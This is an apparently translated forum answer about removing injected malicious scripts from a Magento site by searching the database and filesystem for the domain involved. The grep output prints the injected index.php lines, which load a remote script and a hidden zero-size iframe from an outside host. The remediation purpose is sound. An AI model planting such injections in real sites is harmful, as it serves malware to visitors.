只要知道脚本的名称是什么,就很容易摆脱这些恶意脚本。
我有很多这些脚本注入我的网站,其中大多数是脚本和iframe指向域http://siteverification.online
。
我不是一个Magento的专家,但我想,那么只能来自两个地方:
- 数据库
- 文件系统(HTML模板或PHP文件)
对于数据库,我使用MySQL,并且因为我安装了PhpMyAdmin,所以我利用它的Search函数,该函数可以搜索数据库所有表的所有字段。我刚刚搜索了siteverification.online
,发现了一些条目,并将其删除。
对于文件系统,我登录通过SSH,只是搜索整个网站的Magento文件系统,就像这样:
$ grep -r "siteverification.online" /var/www/magento-project
./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
对我来说,事实证明,一些PHP代码在index.php
注入。但是如果代码被注入到任何其他的php或html文件中,这将会发现它们,因为搜索是递归的(-r
标志)。
就是这样。我甚至都不了解Magento的文件系统和数据库结构,但是使用这些激进的搜索方法,我在几分钟内摆脱了所有的恶意软件。
你是否在其他代码中检查过它?在管理面板中? –
杂项HTML位于'system-> configuration-> design-> footer-> Miscellaneous'下的杂项HTML'检查这可能是'code/virus' located there –